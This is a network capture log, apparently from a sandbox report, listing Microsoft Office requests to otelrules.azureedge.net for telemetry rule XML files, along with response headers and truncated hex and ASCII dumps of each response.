                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                            ETag: "0x8DC582BDC681E17"
                                                                                                                                                            x-ms-request-id: 0480ed94-801e-00ac-5102-17fd65000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030905Z-1657d5bbd48gqrfwecymhhbfm80000000380000000007xhr
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:06 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            112192.168.2.54983713.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:06 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:06 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:06 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1356
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                            ETag: "0x8DC582BDF66E42D"
                                                                                                                                                            x-ms-request-id: db28c537-d01e-0065-47fe-16b77a000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030906Z-1657d5bbd48q6t9vvmrkd293mg00000004a000000000gtz2
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:06 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            113192.168.2.54983813.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:06 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:06 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:06 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1395
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                            ETag: "0x8DC582BE017CAD3"
                                                                                                                                                            x-ms-request-id: cb759915-201e-003f-5f03-176d94000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030906Z-1657d5bbd48brl8we3nu8cxwgn00000004pg00000000k0wz
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:06 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            114192.168.2.54983913.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:06 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:06 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:06 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1358
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                            ETag: "0x8DC582BE6431446"
                                                                                                                                                            x-ms-request-id: 84e7aa3f-c01e-008e-74ff-167381000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030906Z-1657d5bbd48gqrfwecymhhbfm8000000036000000000eaa3
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:06 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            115192.168.2.54984013.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:06 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:06 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:06 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1395
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                            ETag: "0x8DC582BDE12A98D"
                                                                                                                                                            x-ms-request-id: b6c21a8e-c01e-008e-115a-177381000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030906Z-1657d5bbd482tlqpvyz9e93p5400000004d000000000kdeb
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:06 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            116192.168.2.54984113.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:06 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:06 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:06 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1358
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                            ETag: "0x8DC582BE022ECC5"
                                                                                                                                                            x-ms-request-id: 76165599-601e-000d-1a02-172618000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030906Z-1657d5bbd48xlwdx82gahegw4000000004f000000000tg0h
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:06 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            117192.168.2.54984213.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:07 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:07 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:07 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1389
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                            ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                            x-ms-request-id: b6b3fe24-d01e-0028-05e6-187896000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030907Z-1657d5bbd48t66tjar5xuq22r800000004d0000000007bc6
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:07 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            118192.168.2.54984313.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:07 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:07 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:07 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1405
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                            ETag: "0x8DC582BE12B5C71"
                                                                                                                                                            x-ms-request-id: 6f1c5b1d-901e-0048-485a-17b800000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030907Z-1657d5bbd48qjg85buwfdynm5w00000004m0000000000caz
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:07 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            119192.168.2.54984413.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:07 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:07 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:07 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1352
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                            ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                            x-ms-request-id: a9a45936-c01e-00a1-54f1-167e4a000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030907Z-1657d5bbd48762wn1qw4s5sd30000000044g00000000tvyw
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:07 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            120192.168.2.54984513.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:07 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:07 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:07 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1368
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                            ETag: "0x8DC582BDDC22447"
                                                                                                                                                            x-ms-request-id: 173e0f62-801e-00a3-24fe-167cfb000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030907Z-1657d5bbd482lxwq1dp2t1zwkc000000040g00000000u806
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
